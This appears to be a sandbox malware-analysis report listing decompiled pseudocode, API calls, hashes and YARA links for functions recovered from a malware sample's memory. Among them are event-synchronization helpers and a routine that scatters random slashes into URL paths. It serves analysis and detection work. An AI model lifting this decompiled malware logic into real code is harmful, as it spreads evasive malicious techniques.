Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: f8a4ed9de0b3476b6e99384d5ade1b65235b62d78e3913b92d13e7e45939b5a9
Instruction ID: 12e2b08a941a14483a1dc750b8c76945f60fc942df0b9ff0b049be5c5d2a67c2
Opcode Fuzzy Hash: f8a4ed9de0b3476b6e99384d5ade1b65235b62d78e3913b92d13e7e45939b5a9
Instruction Fuzzy Hash: F241B271A00219AFEB109F6ADC44BFE7779EF49314F004669E909A7381EB70BE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 047E49D0 Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E047E49D0(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x47ea310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x47ea348; // 0xc3d5a8
				_t3 = _t8 + 0x47eb7b4; // 0x61636f4c
				_t25 = 0;
				_t30 = E047E74EC(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x47ea34c, 1, 0, _t30);
					E047E61DA(_t30);
				}
				_t12 =  *0x47ea2fc; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E047E30D5() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E047E37DF(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x47ea124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E047E23C4(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x047e49d1
0x047e49d8
0x047e49e2
0x047e49e6
0x047e49ec
0x047e49fb
0x047e4a02
0x047e4a06
0x047e4a18
0x047e4a1a
0x047e4a1a
0x047e4a1f
0x047e4a26
0x047e4a7d
0x047e4a7d
0x047e4a83
0x047e4a85
0x047e4a85
0x047e4a8f
0x047e4a93
0x047e4aa5
0x047e4aa5
0x047e4aa9
0x047e4aaf
0x047e4aaf
0x00000000
0x047e4a3f
0x047e4a44
0x047e4a4c
0x047e4a50
0x047e4a54
0x047e4a54
0x047e4a61
0x047e4a65
0x047e4a69
0x047e4abe
0x047e4ac4
0x047e4ac4
0x047e4a77
0x047e4a7b
0x047e4ab2
0x047e4ab4
0x047e4ab7
0x047e4ab7
0x00000000
0x047e4ab4
0x047e4a7b
0x00000000
0x047e4a65

APIs

Part of subcall function 047E74EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,05429E00,00000000,?,?,43175AC3,00000005,047EA00C,4D283A53,?,?), ref: 047E7522
Part of subcall function 047E74EC: lstrcpy.KERNEL32(00000000,00000000), ref: 047E7546
Part of subcall function 047E74EC: lstrcat.KERNEL32(00000000,00000000), ref: 047E754E

CreateEventA.KERNEL32(047EA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,047E6A95,?,?,?), ref: 047E4A11

Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6

WaitForSingleObject.KERNEL32(00000000,00004E20,047E6A95,00000000,00000000,?,00000000,?,047E6A95,?,?,?), ref: 047E4A71
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,047E6A95,?,?,?), ref: 047E4A9F
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,047E6A95,?,?,?), ref: 047E4AB7

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: d0aed7533a46b5aee1deac40b60dacb684ceb08d78a967a74756d806f10faf95
Instruction ID: 0d388824017456f43a5418725399e7e8b723e0f6fa6df65b8741ef7b4f5cb140
Opcode Fuzzy Hash: d0aed7533a46b5aee1deac40b60dacb684ceb08d78a967a74756d806f10faf95
Instruction Fuzzy Hash: E621E4736003119BD7319A6B9C48ABB77E9EB8CB24B054725FE41EB341DB24FC009758

Uniqueness

Uniqueness Score: -1.00%

Function 047E69E6 Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E047E69E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E047E2A3D(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E047E28B3(_t23);
						}
					}
					return _t38;
				}
				if(E047E6ADC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x47ea34c, 1, 0,  *0x47ea3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E047E5704(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E047E4C94(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E047E7220(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E047E49D0( &_v32, _t39);
					goto L13;
				}
			}

0x047e69e6
0x047e69f3
0x047e69f9
0x047e69fa
0x047e69fb
0x047e69fc
0x047e69fd
0x047e6a01
0x047e6a0d
0x047e6a11
0x047e6a99
0x047e6a99
0x047e6a9c
0x047e6a9e
0x047e6aa6
0x047e6aac
0x047e6aaf
0x047e6aaf
0x047e6aac
0x047e6aba
0x047e6aba
0x047e6a24
0x047e6a26
0x047e6a26
0x047e6a3d
0x047e6a41
0x047e6a44
0x047e6a4f
0x047e6a56
0x047e6a56
0x047e6a5f
0x047e6a63
0x047e6a71
0x047e6a65
0x047e6a65
0x047e6a66
0x047e6a67
0x047e6a68
0x047e6a69
0x047e6a6a
0x047e6a6a
0x047e6a76
0x047e6a79
0x047e6a7d
0x047e6a7f
0x047e6a7f
0x047e6a86
0x00000000
0x047e6a88
0x047e6a88
0x047e6a95
0x00000000
0x047e6a95

APIs

CreateEventA.KERNEL32(047EA34C,00000001,00000000,00000040,?,?,746AF710,00000000,746AF730), ref: 047E6A37
SetEvent.KERNEL32(00000000), ref: 047E6A44
Sleep.KERNEL32(00000BB8), ref: 047E6A4F
CloseHandle.KERNEL32(00000000), ref: 047E6A56

Part of subcall function 047E5704: WaitForSingleObject.KERNEL32(00000000,?,?,?,047E6A76,?,047E6A76,?,?,?,?,?,047E6A76,?), ref: 047E57DE

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 8e4796501219064b5a71a08952a6c7e74c8f04799d5e73bcc653dbc2cfa3db5c
Instruction ID: cded6844e217626dbb04b76b8c6390e931ba7249fcbcb83a9d85c41939802ce6
Opcode Fuzzy Hash: 8e4796501219064b5a71a08952a6c7e74c8f04799d5e73bcc653dbc2cfa3db5c
Instruction Fuzzy Hash: B82144B3D00119ABDB30AFE798888FE77ADDB1C214B458629EA11A7300D635B9559790

Uniqueness

Uniqueness Score: -1.00%

Function 047E4461 Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E047E4461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E047E33DC(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x047e446d
0x047e4471
0x047e4472
0x047e4473
0x047e4475
0x047e4477
0x047e447a
0x047e447f
0x047e4516
0x047e451d
0x047e451d
0x047e4488
0x047e448f
0x047e449f
0x047e449f
0x047e44a5
0x047e44a7
0x047e44ac
0x047e44b5
0x047e44bb
0x047e44c0
0x047e44cb
0x047e44cf
0x047e44d1
0x047e44d2
0x047e44db
0x047e44df
0x047e44f0
0x047e44e1
0x047e44e6
0x047e44eb
0x047e44fa
0x047e44fa
0x047e44cf
0x047e4500
0x047e4506
0x047e4506
0x047e450f
0x047e4514
0x047e4514
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 047E448F
lstrlenW.KERNEL32(?), ref: 047E44C5
memcpy.NTDLL(00000000,?,?,?), ref: 047E44E6
SysFreeString.OLEAUT32(?), ref: 047E44FA

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: c215924a569eb458ab662e52e73b85786ee4f9cb56dd64a8613184af6d8f6c5b
Instruction ID: a4d539844c1de1c05179a6207c28f02a1abf909e394fca3182a095cd3b344035
Opcode Fuzzy Hash: c215924a569eb458ab662e52e73b85786ee4f9cb56dd64a8613184af6d8f6c5b
Instruction Fuzzy Hash: 712132B5A00209EFDB11DFA5D9889EEBBB5FF4D314B108269E905E7300EB34EA01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 047E2708 Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E047E2708(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x47ea2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x47ea2f0; // 0x8fa6e5a0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x47ea2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x047e2710
0x047e2713
0x047e2719
0x047e2731
0x047e2733
0x047e2738
0x047e273a
0x047e273d
0x047e273f
0x047e2742
0x047e2744
0x047e2744
0x047e2746
0x047e2751
0x047e2756
0x047e2767
0x047e276f
0x047e2774
0x047e2777
0x047e277a
0x047e277c
0x047e277f
0x047e2782
0x047e2782
0x047e2785
0x047e2790
0x047e2795
0x047e279f

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,047E6708,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E2713
RtlAllocateHeap.NTDLL(00000000,?), ref: 047E272B
memcpy.NTDLL(00000000,05429600,-00000008,?,?,?,047E6708,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E276F
memcpy.NTDLL(00000001,05429600,00000001,047E3ECE,00000000,05429600), ref: 047E2790

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 09ab169541ea4cf7d5bac85b254b2be8f0b65ebba83ecf9278128b61e2b05953
Instruction ID: e3af93278f37b725d2725226e1018e1f79fde2742fd79e1f0dbe247881680b52
Opcode Fuzzy Hash: 09ab169541ea4cf7d5bac85b254b2be8f0b65ebba83ecf9278128b61e2b05953
Instruction Fuzzy Hash: 3F110A72A00215AFD7108A6ADD84DAE7BBEEBC8360B154375F504DB241E7759E008790

Uniqueness

Uniqueness Score: -1.00%

Function 047E23C4 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E047E23C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E047E3A63(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x47ea348; // 0xc3d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x47eb50c; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x47eb8d8; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E047E5B56();
					_push( &_v64);
					if( *0x47ea100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E047E5B56();
				}
				return _t28;
			}

0x047e23c4
0x047e23cb
0x047e23d9
0x047e23dd
0x047e23e7
0x047e23ec
0x047e23f1
0x047e23f6
0x047e2400
0x047e240a
0x047e240a
0x047e2402
0x047e2402
0x047e2402
0x047e2402
0x047e2410
0x047e2416
0x047e2417
0x047e241a
0x047e241d
0x047e2420
0x047e2428
0x047e2431
0x047e2439
0x047e2439
0x047e243b
0x047e243d
0x047e243d
0x047e2447

APIs

Part of subcall function 047E3A63: SysAllocString.OLEAUT32(00000000), ref: 047E3ABD
Part of subcall function 047E3A63: SysAllocString.OLEAUT32(0070006F), ref: 047E3AD1
Part of subcall function 047E3A63: SysAllocString.OLEAUT32(00000000), ref: 047E3AE3

memset.NTDLL ref: 047E23E7
GetLastError.KERNEL32 ref: 047E2433

Strings

<, xrefs: 047E23F6
@MetNet, xrefs: 047E2433

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <$@MetNet
API String ID: 3736384471-3263418992
Opcode ID: 8f82f7763146933a81b725447da5b3c9d34c660da03e376f6ef2d100f7a7215e
Instruction ID: a92264b165f986bca8ad9ec785094cc3059eeb517eed1a7e45ef59aa701c759e
Opcode Fuzzy Hash: 8f82f7763146933a81b725447da5b3c9d34c660da03e376f6ef2d100f7a7215e
Instruction Fuzzy Hash: DF014471900218ABD711DFA6D884EDD7BBCEB0C744F408266F904E7341E774AD408BD1

Uniqueness

Uniqueness Score: -1.00%

Function 047E7843 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E7843(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x047e784d
0x047e7851
0x047e7866
0x047e7868
0x047e786d
0x047e7873
0x047e7875
0x047e787a
0x047e7885
0x047e787c
0x047e787c
0x047e787c
0x047e787a
0x047e7893

APIs

memset.NTDLL ref: 047E7851
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,746981D0,00000000,00000000), ref: 047E7866
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 047E7873
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?), ref: 047E7885

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: beb325a873c7877eee2f607794f0102a84fed5e02b991ce6fd95e1eae83fad7e
Instruction ID: 0e2798fad843167157c9c7e2ad7ef5cfb2de6faa7fb5da19d5bdd2fce1499468
Opcode Fuzzy Hash: beb325a873c7877eee2f607794f0102a84fed5e02b991ce6fd95e1eae83fad7e
Instruction Fuzzy Hash: 2BF054F11043087FE3145F27DCC4C77BB9CEB991987114E3EF14295611D675AC058A60

Uniqueness

Uniqueness Score: -1.00%

Function 047E3230 Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E3230() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x47ea30c; // 0x1ac
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x47ea35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x47ea30c; // 0x1ac
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x47ea2d8; // 0x5030000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x047e3230
0x047e3237
0x047e3281
0x047e3283
0x047e3283
0x047e323b
0x047e3241
0x047e3246
0x047e324a
0x047e3250
0x047e3257
0x00000000
0x00000000
0x047e3259
0x047e325e
0x00000000
0x00000000
0x00000000
0x047e325e
0x047e3260
0x047e3268
0x047e326b
0x047e326b
0x047e3271
0x047e3278
0x047e327b
0x047e327b
0x00000000

APIs

SetEvent.KERNEL32(000001AC,00000001,047E109A), ref: 047E323B
SleepEx.KERNEL32(00000064,00000001), ref: 047E324A
CloseHandle.KERNEL32(000001AC), ref: 047E326B
HeapDestroy.KERNEL32(05030000), ref: 047E327B

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 8b7700602304bc1bac64543859b4853c27c0492f108fbb69d657ccb99e91bcaf
Instruction ID: 0ad87824b87b85c6dfaf736fa337f5049638fd4c5c24fe75a60f00d9cdd5beb9
Opcode Fuzzy Hash: 8b7700602304bc1bac64543859b4853c27c0492f108fbb69d657ccb99e91bcaf
Instruction Fuzzy Hash: 75F0ACB6B0121297DB109A77DA88AE63BECEB0C761B458754BD41EF3C2DB28EC409560

Uniqueness

Uniqueness Score: -1.00%

Function 047E2058 Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E047E2058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E047E33DC(_t2);
				if(_t34 != 0) {
					_t30 = E047E33DC(_t28);
					if(_t30 == 0) {
						E047E61DA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E047E7AE9(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E047E7AE9(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x047e2058
0x047e2062
0x047e2064
0x047e206a
0x047e206a
0x047e2073
0x047e2077
0x047e2083
0x047e2087
0x047e20fb
0x047e2089
0x047e2089
0x047e208d
0x047e2092
0x047e2097
0x047e20b1
0x047e20a0
0x047e20a0
0x047e20a4
0x047e20a7
0x047e20ac
0x047e20ac
0x047e20b6
0x047e20de
0x047e20e4
0x047e20e7
0x047e20b8
0x047e20ba
0x047e20c2
0x047e20cd
0x047e20d2
0x047e20d2
0x047e20ee
0x047e20f5
0x047e20f6
0x047e20f6
0x047e2087
0x047e2106

APIs

lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?,?,746981D0), ref: 047E2064

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

Part of subcall function 047E7AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,047E2092,00000000,00000001,00000001,?,?,047E51F7,?,?,?,?,00000102), ref: 047E7AF7
Part of subcall function 047E7AE9: StrChrA.SHLWAPI(?,0000003F,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?,?,746981D0,00000000), ref: 047E7B01

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?), ref: 047E20C2
lstrcpy.KERNEL32(00000000,00000000), ref: 047E20D2
lstrcpy.KERNEL32(00000000,00000000), ref: 047E20DE

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 4a9c5cd2886e4f81424b2d45f6ad5bd0e815fcca367d7343d4f0a91d2bd9d50a
Instruction ID: 3cead67941259d549ef59be3285428dfad3c5ab885e2e5d88805f39b8065b3c4
Opcode Fuzzy Hash: 4a9c5cd2886e4f81424b2d45f6ad5bd0e815fcca367d7343d4f0a91d2bd9d50a
Instruction Fuzzy Hash: 5721F372100216EBCB129FA6C848ABA7FBCEF09254B148694F9059B302D635EA40C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 047E5DE4 Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E5DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E047E33DC(_t25 + _t29 + _t25 + _t29 + 2);
